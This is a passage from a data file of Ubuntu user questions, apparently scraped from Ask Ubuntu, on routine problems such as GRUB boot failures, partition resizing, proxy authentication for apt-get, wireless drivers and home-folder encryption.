495919	restoring backup files from xp to ubuntu	since xp is no longer supported and i have no desire to enrich mr. gates any more by upgrading i have decided to take the plunge and run ubuntu on my main home desktop . the goal here is to completely wipe my main drive and install ubuntu . however , i have ammased quite a collection of photos and important documents on my drive and i need to backup and then restore them . these files are frankly scattered all over the place on my drive and it would likely take days to ensure i have them all backed up if i were to do it one folder at a time . i currently backup my files using windows backup to a second hard drive . what i want to know is can i view the windows backed up files in ubuntu and then select the ones i need to restore ? i 'd like to be able to sort them by filetype and then choose the ones i want to restore . and what about specific windows programs ? for example , i have an extensive file on geneology using family tree maker . will i be able to access this file using ubuntu ? is there frankly an easy way to do all this ?
495920	php5enmod returns command not found	i 've tried a number of guides on this issue , but so far i can not get php5enmod mcrypt to work . ubuntu 12.04 php 5.3.10 here is the output ls of /etc/php5/conf.d and /etc/php5/mods-available https : //privatepaste.com/35aee04356 root : ~ # sudo php5enmod mcrypt sudo : php5enmod : command not found root : ~ #
495923	recover encrypted home partition from fedora	i decided to switch to ubuntu from fedora . in fedora i had the /home folder in its own partition and then had that partition encrypted . also in the past when formatting fedora i was able to reuse that partition without formatting . in the fedora installation process it would offer me to unlock the partition and use it as is . i was expecting ubuntu could do the same or similar . i used the 14.04 liveusb and went through the installation . i set my /home mount point to the same partition in the same way as i do in fedora and did not check format box . after that the installation process started and then went on to fill in my log in details , on that same window there was a checkbox to encrypt the home folder , so i chose that . installation went without more trouble and after booting for the first time , the home directory was completely clean . even more scary , gparted showed the whole partition was empty =/ what happened ? did ubuntu installation formatted the disk without asking/confirming with me ? if so , is there a way to get those files back ? remember , they were inside the fedora encrypted partition . hope anyone can shed some light on what happened and any ideas to recover my files ! thanks in advance below some system info of this new ubuntu installation : syslog : http : //pastebin.com/utqyvykg boot.log : http : //pastebin.com/ksj7hzgr auth.log : http : //pastebin.com/trxdqiu6 $ df -h filesystem size used avail use % mounted on /dev/sda7 34g 3.0g 29g 10 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 7.8g 12k 7.8g 1 % /dev tmpfs 1.6g 1.2m 1.6g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 7.8g 152k 7.8g 1 % /run/shm none 100m 32k 100m 1 % /run/user /dev/sda6 477m 52m 396m 12 % /boot /dev/sdb3 615g 128m 584g 1 % /home /dev/sda2 96m 29m 68m 30 % /boot/efi /home/joel/.private 615g 128m 584g 1 % /home/joel $ sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 128.0 gb , 128035676160 bytes 255 heads , 63 sectors/track , 15566 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x4a409780 device boot start end blocks id system /dev/sda1 1 250069679 125034839+ ee gpt warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 1 1953525167 976762583+ ee gpt partition 1 does not start on physical sector boundary
495927	gtk : warning can not display	i just upgraded from 13.10 to 14.04 and i am experiencing problems with my dependencies as follows sudo apt-get install gives you might want to run apt-get -f install to correct these . the following packages have unmet dependencies : libmatroska6 depends : libebml4 but it is not installed . recommends : libdvdcss2 but it is not installed . on trying apt-get -f install gives gtk warning can not open display at /usr/share/per15/debconf/frontend/gnome.pm line 94 , < > line 1 . i tried dpkg-reconfigure -f results an dpkg : error : need an action option other unmet dependency package is vlc-nox
495928	nptl 2.15 waiting for another script to finish	i can not start , stop and , or even uninstall my fms 4.5 installed on from my vm ? when i try to start/stop , it display nptl 2.15 waiting for another script to finish ... /opt/adobe/fms # ./uninstallfms nptl 2.15 waiting for another script to finish ...
495929	install xubuntu to sd card via usb memory stick	i would like to install xubuntu . i have a 2 gb usb stick and it works fine every time i try xubuntu in live mode . my plan is to install it on an sd card with 32 gb capacity . i do not want to do partitioning on my current hard disk , i am not the only user of the computer . we have no external or portable hard disk . i will try xubuntu in live mode and install it on the sd card without modifying any portion of the current hard disk ( now with windows 7 ) . will my plan work ? i do not know if it will affect any content on our windows 7 or any portion of the boot manager .
495930	how can we remove text from start to some particular selected word using sed command in linux	i have a simple query related to selection and replacing text in linux . for explaning question i am using sed command . i have following text . hello world , i am just simple text for display . now i want to print to hello world only i can do it using following command in linux . echo `` hello world , i am just simple text for display . '' | sed 's/ , i am . *//g' now i want totally inverse of this function , how can i remove hello world by using simple command just like sed . output required . , i am just simple text for display . it will very fruitful if linux commands ( sed etc ) are used . thanks
495932	gparted closing when applying operations	recently i 've been trying to get lubuntu 14.04 running off of a sd card ( the computer i 'm running this on only has 1 gb of hard disk space ) . i 've created and used `` live sd '' 's like this with persistence before , but i needed more space . i checked out a number of sources ( like this one ) , and most of them recommended using gparted to create a seperate `` casper-rw '' partition . i usually use windows 8.1 for most of my work , so i loaded up a ubuntu 14.04 ( not lubuntu ) virtual machine in virtualbox . after managing to access the sd card in the virtual machine , i brought up gparted and followed the instructions ( except i used ext4 instead of ext2 ) . gparted gave me a number of warnings such as `` moving a partition might cause your operating system to fail to boot . '' that i had n't seen mentioned in the tutorial . finally , i clicked `` apply all operations '' , and it asked me if i wanted to use fat32 . i chose yes . seconds after this decision , the program closed altogether , followed with messages about hardware problems . i figured that it was an issue with the way that virtualbox was accessing the sd card , so i decided to create an additional live-usb with lubuntu on it . i booted from this live-usb , then inserted the sd card . i used gpartition again , and it gave me the same warnings . finally , after choosing to use fat32 , the program simply shut down again , this time with no warning . i found another post suggesting that i simply use fedora , though i do n't think this really solves or explains the problem . is there a new way that i should be doing this ? is the tutorial simply outdated ? update : it appears that using gparted on fedora works well , though it took an exceptionally long amount of time even on my best computer . will make sure to test this out on ubuntu again later to find out what the problem is .
495938	script adding launchers to the top gnome panel	for a large number of machines running 12.04 with gnome-classic . i 'd like to script adding launchers to the top left of the gnome panel . i know how to add them manually but this is a tedious procedure . does anyone know if it is possible to script this ?
495941	software updater needs more disk space	i got the following error message from software updater : the upgrade needs a total of 74,6 m free space on disk '/boot ' . please free at least an additional 68,3 m of disk space on '/boot ' . empty your trash and remove temporary packages of former installations using 'sudo apt-get clean ' . how can i get more disc space ? i have df -h filesystem size used avail use % mounted on /dev/mapper/xubuntu -- vg-root 454g 13g 418g 3 % / none 4,0k 0 4,0k 0 % /sys/fs/cgroup udev 1,9g 4,0k 1,9g 1 % /dev tmpfs 384m 1,3m 383m 1 % /run none 5,0m 0 5,0m 0 % /run/lock none 1,9g 24m 1,9g 2 % /run/shm none 100m 36k 100m 1 % /run/user /dev/sda2 237m 219m 6,1m 98 % /boot /dev/sda1 511m 3,4m 508m 1 % /boot/efi
495943	zsh fade and fire prompts do n't look so smooth in yakuake as in gnome-terminal	i am using kubuntu 14.10 with yakuake and zsh installed . i like default fire/fade prompts included to the default zsh distribution . they look really nice for me , but i can not make them look in yakuake as nice as they look in gnome-terminal : seems that this is provided by the gnome-terminal itself , not by the any of fonts as every font results the same in gnome-terminal but in yakuake these dots are still there . could anyone suggest any workaround to make █▓▒░ characthers smooth in yakuake ?
495947	a logo disappear in xubuntu	i use xfce on my xubuntu , and now i found a problem . when i move my mouse on the upper screen ( =separator i think ) where are tabs of started applications , hold left mouse button down and drag the application logo ( for example firefox ) , the xfce logo ( face of mouse ) disappears but comes back if i put mouse over the logo , i.e . in the upper left corner . is this a bug or is there a fix of it ?
495950	why ubuntu and other linux distros are free ?	i 'm a new linux user . building an os is pretty tough work i guess . it needs lot of hardwork & patience . but after all this how the creators make linux distros free of charge ? i want to know details about how they earn profit from it . please discuss .
495954	force delete on usb drive failed	i need to delete bunch of .txt file on my usb drive . these files are logs generated from a tv board . they all have read-only permission ( -rw-r -- r -- ) this is what i tried ( all failed ) : -format : sudo fdisk -l sudo umount /dev/sdb1 umount : /dev/sdc1 : not mounted sudo mkfs.vfat -f 16 /dev/sdb1 warning : not enough clusters for a 16 bit fat ! the filesystem will be misinterpreted as having a 12 bit fat without mount option `` fat=16 '' . mkfs.vfat : attempting to create a too large file system -sudo chmod 777 *.txt -sudo rm *.txt is there any other method that i can try ? added : my usb stick does not have any sort of write-protect-switch at all . what i am trying to do is to delete all files by any methods .
495955	keyboard layout/language changes in every boot	i have ubuntu installed in my laptop , with catalan language support and i have properly set up my keyboard to the spanish layout . however , every time i start ubuntu , the keyboard language/layout has switched to english ( i think ) and i have to select the correct disposition again ( `` es '' ) . the tray icon , though , always shows `` es '' as the input language , which , by the way , is the only option available . is there a way to tell ubuntu to properly configure the keyboard ? edit : once i login , i always change the language using the top-left button on the tray ( see the `` [ es ] '' icon in the picture below : )
495957	how to disable the `` unlock your keyring '' popup in 14.04 ?	i read through all the related answers , but they do not apply to ubuntu 14.04 . i have no .gnome2 folder and no passwords and encryption keys item in the system settings . i tried to crawl through every possible menu , but i could not find out how to do it . the popup usually pops out when i start chromium .
495961	gnome on ubuntu 14.04 crashes after starting progress db	i am a progress 4gl application developer . i recently upgraded from ubuntu 12.04 lts to 14.04 . i 'm using gnome and never had this problem before . now whenever i start a progress db using my terminal ( did n't try any other method ) then the gnome ui crashes and logs me out . when i log back again then all the open windows are gone ( quite logical ) and the db 's are running . so i just have get a terminal to start working again but this is very frustrating . i 'm using ubuntu on macbook pro via oracle virtualbox vm . any fixes/suggestion are most welcome .
495962	how to autostart synergy on ubunutu 14.04 ?	i am using synergy to share mouse and keyboard . i would like it to start automatically and have used the tutorial for this here . i am new to ubuntu and can not find this menu : system menu > preferences > startup applications so i tried the before logging in steps : but i can not find the file /etc/gdm/init/default i have been able to find /usr/share/gdm/autostart/loginwindow/ but there is n't anything of use there . in /etc there is only /etc/gdb
495965	how to display line numbers with pygmentize	i often use the command pygmentize filename.py to show color source files with code formatting . this works like a charm . i now also want to show line numbers like cat -n filename.py does . i read around and found some suggestions like adding -o linenos=1 or -o linenos=true . none of this seems to work though . does anybody have any idea how i can show line numbers when viewing source files on the command line with pygments ? all tips are welcome !
495968	putting unallocated space on drive to use	i have a fine dual boot system ( winxp || trusty14.04 ) with a /dev/sda already maxed out in terms of number of primary partitions ( sda1 , sda2 , sda3 , sda4 ) . partition start end size type file system flags sda1 32.3kb 44.0gb 44.0gb primary ntfs sda2 44.0gb 44.5gb 500mb primary ext3 boot sda3 44.5gb 52.5gb 8000mb primary swap sda4 52.5gb 187gb 135gb extended sda5 52.5gb 72.5gb 20.0gb logical ext3 sda6 72.5gb 175gb 102gb logical ext3 sda7 175gb 187gb 12.5gb logical ext3 unalloc 187gb 201gb 14.0gb -- -- -- -- -- i want to resize and move things around on my internal device /dev/sda , while booted from /dev/sdb . i use gparted . i have 14 gb of unallocated space , at the end of the partitioned space on /dev/sda , that is after the extended partition /dev/sda4 . i want to reclaim that unallocated space , for instance adding it to my sda6 , which in my case happens to be /home . i seem to be stuck because ms-dos part-table scheme does not allow more than 4 primary partitions and every time i try to resize the last logical partition sda7 ( inside the extended partition sda4 ) to use a little or all of the unallocated space , gparted tells me it hits a wall . i also tried copying /dev/sda7 onto the unallocated space , evidently to no avail , because that would violate the 4 primary partitions ceiling . is there a way out ? or is it that short of a fresh reinstall i have effectively lost 14gb of perfectly good storage space ? that would not be so bad , if a bit-to-bit copy of the /dev/sda described above on a much larger /dev/sdb new drive ( to be used as boot ) , had not left more than 350gb of unallocated space in the exact same configuration . 350gb of ssd storage space beyond my system 's reach ( short of a complete reinstall ) is clearly unacceptable . i noticed that although the whole of /dev/sda seems unmounted , sda5 has a its mount point on / and seems to be mounted . when trying to unmount it to resize the extended partition /dev/sda4 , i can not . instead i get an error message to the tune of : `` most likely other partitions are also mounted on these mount points . you are advised to unmount them manually . '' note : i have seen other posts and answers , but they either do not answer my question or seem not to receive a satisfactory answer as in here and in here . in the latter , i tried waltinator 's method but gparted does not let me move sda7 to the end of the unallocated space . i am stumped . any help appreciated .
495969	how can i see which vlan a virtual network interface is assigned to	after i created a new virtual interface like this : ip link add link eth0 name eth0.100 type vlan id 100 how can i afterwards verify that a virtual interface is configured for that vlan ? neither ip link show eth0.100 nor ip a s seems to show any vlan information .
495972	uninstall a package that i have installed using a .sh script	i have more older versions of netbeans installed on my system and i would like to uninstall them . the problem is that i have installed them all from a .sh shell installer script simply running from cmd and none of synaptics , apt , dpkg nor software center knows about any netbeans installation . i know i could probably run the installer again and select the uninstall/remove option but i have already deleted all of the installers long time ago and downloading them again just to be able to uninstall current installations is not a solution for me . is it possible to just delete the local files ( since none of the packaging software knows about them ) and consider this operation as uninstall ? or is there some better option ?
495974	unable to unblock ideapad z570 broadcom wireless adapter	i have a lenovo ideapad z570 laptop with bcm4313 adapter ... $ lspci -vvnn | grep 14e4 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11bgn wireless network adapter [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:051b ] based on the several posts available online for this adapter , i have so far tried various combinations of different drivers available . finally , i 'm at the 2nd solution offered in this page ... installing broadcom wireless drivers i.e . i 'm using brcmsmac module . blacklisted the following ... blacklist b43 blacklist bcma blacklist wl blacklist ssb blacklist acer_wmi added brcmsmac to /etc/modules list . but my rfkill listing still shows the interface to be hardware blocked ... $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : yes < < < < 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no but my hardware switch seems to be on . ( there is a single switch for bluetooth and wifi , and bluetooth is working fine ) dmesg shows error during brcmsmac driver loading ... $ dmesg|grep brcmsmac [ 16.664016 ] brcmsmac bcma0:0 : mfg 4bf core 812 rev 24 class 0 irq 17 [ 16.698271 ] ieee80211 phy0 : registered radio enabled led device : brcmsmac-phy0 : radio gpio : 243 [ 25.018128 ] brcmsmac bcma0:0 : brcms_ops_start : brcms_up ( ) returned -132 after some googling , i see that 132 errno corresponds to erfkill , indicating that the interface is hardware blocked . so , is this really a hardware problem ? or some bug in driver code ? any suggestions on how to conclude , without having to try other oses to check ?
495975	encrypting home folder in ubuntu 12.04 server	how can i encrypt the home folder in ubuntu 12.04 server on-the-fly ? i tried this : root @ avo-server : /home/avo # ecryptfs-migrate-home -u avo info : checking disk space , this may take a few moments . please be patient . info : checking for open files in /home/avo info : the following files are in use : command pid user fd type device size/off node name bash 1669 avo cwd dir 8,1 4096 1185899 /home/avo sudo 1806 root cwd dir 8,1 4096 1185899 /home/avo su 1807 root cwd dir 8,1 4096 1185899 /home/avo bash 1808 root cwd dir 8,1 4096 1185899 /home/avo ecryptfs- 1909 root cwd dir 8,1 4096 1185899 /home/avo lsof 1931 root cwd dir 8,1 4096 1185899 /home/avo sed 1932 root cwd dir 8,1 4096 1185899 /home/avo lsof 1933 root cwd dir 8,1 4096 1185899 /home/avo error : can not proceed . i 'm getting error : can not proceed .
495978	ubuntu and xen . disable standard vga for windows guest	i 've found a lot of help on this site , so i am ready to ask my own question now . after some new hardware purchase i 've started up with ubuntu 14.04 lts and xen 4.4 . my current problem is : if i add more than 2048 mb ram for the guest system , only the standard vga can be used , but the ati card not . i 've followed the step-by-step guide of `` powerhouse '' on linux mint forum for the installation of the whole system : http : //forums.linuxmint.com/viewtopic.php ? t=112013 thanks a lot for that ! my hardware : gigabyte z97m-d3h board ( with vt-d ) intel i7 4770 ( with vt-d ) intel hd graphics 4600 for domu ati radeon hd4850 card for windows guest 20 gb ram ( 12 for ubuntu as domu , 1 gb for intel graphics and the rest for dom0 ) the pciback solution works fine . if i give more than 2 gb ram for the win , i get error code 12 ( device ca n't get enough resources ) . it is conflicted by the standard vga card . if i disable this device , the problem still exist . if i delete the device , it comes back after reboot . i tryed nographic=0 option , but nothing is changed . as i read on microsoft forums , it is a winshit problem . if i would be able to disable the standard vga from bios , the problem would disappear , but there are no bios options , hence it is emulated . any ideas ? thank you very much !
495980	default sound device different when run as service	i use squeezelite to play audio streams on my laptop . the laptop has a built-in intel sound card , but i use the hdmi connection to my monitor to play the sound on my monitor speakers . this works well and i can use the media buttons on my keyboard.however , this only works when i execute squeezelite as a background job . things go wrong when i try to run squeezelite as a service . then , the sound is played on the laptop speakers . however , i can specify which sound device i want squeezelite to use . some options are : `` default '' , `` front '' and `` hdmi '' . `` default '' and `` front '' go to the laptop speakers , and `` hdmi '' goes to the monitor speakers but bypasses the media keys . when run manually , the media keys work and both `` default '' and `` hdmi '' go to the monitor speakers . my question is : how can i run squeezelite as a service , with the output sent to the hdmi speakers , and with the media keys working ? could it be that because i am running squeezelite as a service ( as root ) , `` default '' has a different meaning and the media keys are bypassed ? i tried to run the start-stop-daemon as my user , but that did n't work . this is a list of my sound devices : output devices : default - playback/recording through the pulseaudio sound server null - discard all samples ( playback ) or generate zero samples ( capture ) pulse - pulseaudio sound server sysdefault : card=intel - hda intel , alc272 analog - default audio device front : card=intel , dev=0 - hda intel , alc272 analog - front speakers surround40 : card=intel , dev=0 - hda intel , alc272 analog - 4.0 surround output to front and rear speakers surround41 : card=intel , dev=0 - hda intel , alc272 analog - 4.1 surround output to front , rear and subwoofer speakers surround50 : card=intel , dev=0 - hda intel , alc272 analog - 5.0 surround output to front , center and rear speakers surround51 : card=intel , dev=0 - hda intel , alc272 analog - 5.1 surround output to front , center , rear and subwoofer speakers surround71 : card=intel , dev=0 - hda intel , alc272 analog - 7.1 surround output to front , center , side , rear and woofer speakers dmix : card=intel , dev=0 - hda intel , alc272 analog - direct sample mixing device dsnoop : card=intel , dev=0 - hda intel , alc272 analog - direct sample snooping device hw : card=intel , dev=0 - hda intel , alc272 analog - direct hardware device without any conversions plughw : card=intel , dev=0 - hda intel , alc272 analog - hardware device with all software conversions hdmi : card=hdmi , dev=0 - hda ati hdmi , hdmi 0 - hdmi audio output dmix : card=hdmi , dev=3 - hda ati hdmi , hdmi 0 - direct sample mixing device dsnoop : card=hdmi , dev=3 - hda ati hdmi , hdmi 0 - direct sample snooping device hw : card=hdmi , dev=3 - hda ati hdmi , hdmi 0 - direct hardware device without any conversions plughw : card=hdmi , dev=3 - hda ati hdmi , hdmi 0 - hardware device with all software conversions any ideas ?
495981	access to column in python like awk	this is my data file : iam python newbie if i use awk to access columns element , that is easy just by $ 1 . how can i access this columns element on python ?
495994	what filesystem should /boot be ?	i recently decided to set up my custom built system to be linux only and i manually set up /boot , / , and swap partitions with /boot and / being ext4 filesystem types . upon completing installation of ubuntu 13.10 ( as my 14.04 iso was corrupt ) and restarting , i would be faced with grub rescue prompt . i tried installing the boot loader installation on /dev/sda and /dev/sda1 where my /boot partition was and it seemed my system could not find grub . i finally got tired of messing around with this and deleted all my partitions using gparted and installed from a live dvd and allowed the installer to install ubuntu for me . when it was done installing , i became curious and checked via gparted how the partitions were set up and the partitions were the same with the exception of /boot was using the fat32 filesystem . i rebooted the system and it booted up correctly with no problems . are there certain filesystem types that should be used for the /boot partition simply so grub will be found/read ?
495997	how to properly restart unity ?	i keep on experiencing weird bugs . these usually start after a few hours of use . sometimes the dash starts opening under every open window ( becomes only visible on desktop , but i still can search and open anything with the enter key while it 's not visible ) . also , there are other minor annoyances , such as random places ( especially maximized chrome , tabs area ) after navigating between programs with alt+tab ca n't be clicked with the mouse . switching back and forth fixes this . i can not use compiz -- replace since after that , all of the app indicator icons are gone ( only teamviewer stays ) . skype , network , languages , sound ( also keyboard sound up/down stops working ) and date are gone . restarting unity-panel-service does not help . any thoughts on how to resolve these ?
495999	desktop speakers popping	i recently switched over from windows to ubuntu and i 've noticed that the speakers i use now tend to make a popping noise more than when i had been running windows . upon observation it seems that they 'll pop when i 'm loading a random web page or program . is there a way to check what the problem is or fix it using the command line ? i 'm running 14.04 .
496005	can not remove ( or reinstall ) spotify or any other program	i had install spotify a while back but since deleted some folder belonging to it ( accidental rm- rf operation - sh*t happens ) . i now ca n't install any software at all via apt-get ( pip works fine ) when i run sudo apt-get -f install i get the following > ( reading database ... 586089 files and directories currently installed . ) preparing to unpack ... /spotify-client_1 % 3a0.9.11.26.g995ec04.78-1_amd64.deb ... /var/lib/dpkg/info/spotify-client.prerm : 9 : cd : ca n't cd to /opt/spotify/spotify-client dpkg : warning : subprocess old pre-removal script returned error exit status 2 dpkg : trying script from the new package instead ... /var/lib/dpkg/tmp.ci/prerm : 9 : cd : ca n't cd to /opt/spotify/spotify-client dpkg : error processing archive /var/cache/apt/archives/spotify-client_1 % 3a0.9.11.26.g995ec04.78-1_amd64.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 2 /var/lib/dpkg/info/spotify-client.postinst : 5 : cd : ca n't cd to /opt/spotify/spotify-client dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : /var/cache/apt/archives/spotify-client_1 % 3a0.9.11.26.g995ec04.78-1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) it says it can not cd into /opt/spotify/spotify-client ( because that 's what i deleted ) fix suggestions ? i am more than happy to entirely remove spotify i have tried all of the following sudo apt-get autoremove sudo apt-get autoclean sudo apt-get install [ some package ] fails all fail because it ca n't find the spotify-client i have tried to remove it from /etc/apt/sources.list but no cigar
496007	how can i get ubuntu working on my g4 powerbook 1ghz 17 ''	completely new to linux but very keen to get it working on my g4 powerbook 1ghz 17 have tried install of mintppc 11 which failed to boot xorg and gave error : [ drm ] failed to open device fatal server error : no screens found have also tried install of ubuntu 14.04 from netboot , and that gives a black screen at boot , sometimes also offers a repeating message : [ 55.504281 ] nouveau e [ drm ] ddc responded , but no edid for tv-1 i have tried various xorg files , but not found anything to work . has anyone out there successfully installed to a 1ghz 17 '' g4 powerbook ?
496011	how do i turn off webcam brightness auto-adjust ?	my logitech webcamera adjusts brightness automatically and i do n't like it . i wonder how i could turn this feature off from ubuntu . i downloaded v4l2ucp that seems to be a program to do just that , but interestingly most of its settings is grey ( ca n't set ) the automatic gain/brightness checkbox is clickable however , but it does not work ( the camera still adjusts to brightness automatically ) . i do n't quite know what to do at this point . it is possible to turn this off , right ?
496013	having some trouble authenticating via proxy in order to use apt-get successfully on a corporate network	apologies if this is a basic question , i 've recently taken ownership of our department 's internal server so i 'm having to deal with issues beyond my ( very basic ) knowledge . context our server is on a corporate network which requires corporate proxy authentication ( e.g . enter corporate username and password ) . this is not an issue on the windows machines on that network - when a web browser is opened the user is prompted to authenticate . however , when using a browser on linux the user is not prompted to authenticate , the browser simply shows a message saying authentication is required . problem 1 - internet access would be useful at the moment i have to walk to my desk on another floor if i need to look something up , because i can not get internet access from this machine since i can not * ( *do not know how to ) authenticate . it would be useful to have the ability to authenticate so i can use a web browser . problem 2 - packages can not be updated when i attempt to perform updates using sudo apt-get update or sudo apt-get install [ package ] , there are errors which i believe are caused due to lack of authentication . after performing sudo apt-get update , i get errors like w : failed to fetch [ link ] 401 authorization required . ( for some reason some http : //us.archive.ubuntu.com trusty/ sources work correctly , and some throw the same error ) . this is a major problem , as i need to be able to update packages on the server . steps taken i have installed cntlm via sudo apt-get install cntlm ( it works from one of the few ubuntu repositories that randomly work ) . i edited the configuration at /etc/cntlm.conf and added my username , the domain , and the proxy . i started the service ( sudo /etc/init.d/cntlm start ) i tested the service ( sudo cntlm -i -m http : //www.google.com/ ) and the response was config profile 1/4 ... auth not required ( http code : 307 ) your proxy is open , you do n't need another proxy . i tried performing sudo apt-get update again and still receive the same error message . ( 401 authorization required ) ( whoops ! my mistake ! i see i need to configure apt proxy settings manually ... ) i added the line acquire : :http : :proxy `` http : //localhost:3128 '' ; to /etc/apt/apt.conf . i restarted cntlm . ( sudo /etc/init.d/cntlm stop , sudo /etc/init.d/cntlm start ) i performed sudo apt-get update ... and it hit 0 % [ waiting for headers ] [ waiting for headers ] [ waiting for headers ] [ waiting f - and just stopped there . i performed sudo apt-get clean before performing sudo apt-get update - this started working and then stopped at 19 % [ waiting for headers ] i performed sudo apt-get clean again before performing sudo apt-get update - this started working and then stopped at 0 % [ waiting for headers ] i tried this a third time ( sudo apt-get clean , sudo apt-get update ) and it stopped at 20 % [ waiting for headers ] i researched this subsequent problem and found an answer on askubuntu suggesting this may be an issue with ipv6 causing ics to halt for a while when it receives concurrent connections . i checked the /etc/sysctl.conf file and discovered the ipv6 already appears to be disabled ... ( the lines net.ipv6.conf.all.disable_ipv6 = 1 , net.ipv6.conf.default.disable_ipv6 = 1 , and net.ipv6.conf.lo.disable_ipv6 = 1 are already in the config file . ) ( i 'm now drawing a bit of a blank ! the symptoms match the hypothesized ipv6 issue however if it is already disabled that does n't seem to be able to be the cause ) i performed sudo apt-get clean and sudo apt-get update a fourth time ( what the hell - why not ? ) and it hung on 24 % [ waiting for headers ] this time , but first it hit a bunch of repositories . a repository which used to trigger errors did not do so now ( http : //cran.rstudio.com trusty / ) but one which used to trigger errors now triggered a different error , received http code 501 from proxy after connect .
496016	new to ubuntu 14.04	as you might have read , i ! m new to ubuntu 14.04 after have been running windows xp for a long time . ihave an acer aspire one computer that ran windows xp for over 5 years , but after the end of microsoft 's support to xp i decided to move to ubuntu . but after a few days of tests i have realizad that the computer is very slow even being absolutelly empty . it used to be very slow in the last several months with windows xp too , but i thought that with a new operating system and a brand new hard disk , the problem would be solved . any help would be appreciated . thank you .
496017	ubuntu 12.04 boot repair cd did n't work	i am running ubuntu 12.04 ( 32 bit ) on a 2008 amd computer with full disk encryption . everything was working fine ( for 1 month ) until i did a software update , and now it will not boot . before the update , i would get a number of options to select to boot . now it goes straight to the âno videoâ screen that my monitor generates . i ran the boot repair and here is the url info : http : //paste.ubuntu.com/7772771/ when i originally loaded ubuntu 12.04 from the cd i needed to select the acpi off and no acpi options under the advanced tab on the cd in order to get it to work with my hardware . however that was mainly to get the mouse and keyboard to work , the video worked just fine . could the update have reset these settings ?
496020	unable to install software with armv7l architecture ( xubuntu 13.10 )	i 'm currently trying to install splashtop streamer ( a remote desktop software ) on an odroid device ( it 's kinda like a raspberry pi ) which runs on xubuntu 13.10 with an armv7l architecture ( that 's what i get when i run uname -m in a terminal ) . when i try to install splashtop streamer ( i 've tried with the 4 versions here http : //www.splashtop.com/linux # download ) i always get the error `` wrong architecture 'i386 ' '' or `` wrong architecture 'amd64 ' '' in the software center , depending on the version i 'm trying to install . has someone been through this before or can someone help me ?
496027	problem with dual boot ubuntu-windows	i have one desktop ( 64-bit ) and one old netbook ( 32-bit ) . both of them have windows 7 ( only ) . i have a usb hard disk which has ubuntu ( 64-bit ) which boots without problems from the desktop and recently i installed ubuntu 32-bit ( in the usb hd ) in order to use them with my netbook . the problem is that although they boot with the desktop pc , when i try to boot from netbook i get the error : unknown filesystem grub rescue > _ when i give > ls i get only ( hd0 , msdos1 ) , ( hd0 , ... ) , ... that is bios ( i assume ) can not see the internal hdd of the netbook . any ideas to boot from the netbook ? also i provide some information which i got from ubuntu live cd ( try it choice ) from my netbook . boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > windows is installed in the mbr of /dev/sda . = > grub2 ( v1.99 ) is installed in the mbr of /dev/sdb and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 112 for . sda1 : ______________________________________________________________________ file system : vfat boot sector type : windows 7 : fat32 boot sector info : no errors found in the boot parameter block . operating system : windows vista boot files : /windows/system32/winload.exe sda2 : ______________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe sdb1 : ______________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : /grub/grub.cfg sdb2 : ______________________________________________________________________ file system : extended partition boot sector type : unknown boot sector info : sdb5 : ______________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 14.04 lts boot files : /etc/fstab sdb6 : ______________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : boot files : sdb7 : ______________________________________________________________________ file system : swap boot sector type : - boot sector info : sdb3 : ______________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sdb4 : ______________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 14.04 lts boot files : /boot/grub/grub.cfg /etc/fstab ============================ drive/partition info : ============================= drive : sda _________________________________________________________________ disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 2,048 6,146,047 6,144,000 12 compaq diagnostics /dev/sda2 * 6,146,048 234,438,655 228,292,608 7 ntfs / exfat / hpfs drive : sdb _________________________________________________________________ disk /dev/sdb : 1000.2 gb , 1000170586112 bytes 255 heads , 63 sectors/track , 121597 cylinders , total 1953458176 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sdb1 2,048 976,895 974,848 83 linux /dev/sdb2 978,942 272,461,823 271,482,882 5 extended /dev/sdb5 978,944 71,233,535 70,254,592 83 linux /dev/sdb6 71,235,584 264,648,703 193,413,120 83 linux /dev/sdb7 264,650,752 272,461,823 7,811,072 82 linux swap / solaris /dev/sdb3 * 272,461,824 886,861,823 614,400,000 7 ntfs / exfat / hpfs /dev/sdb4 886,861,824 1,082,174,323 195,312,500 83 linux '' blkid '' output : ____________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 0475-3980 vfat recovery /dev/sda2 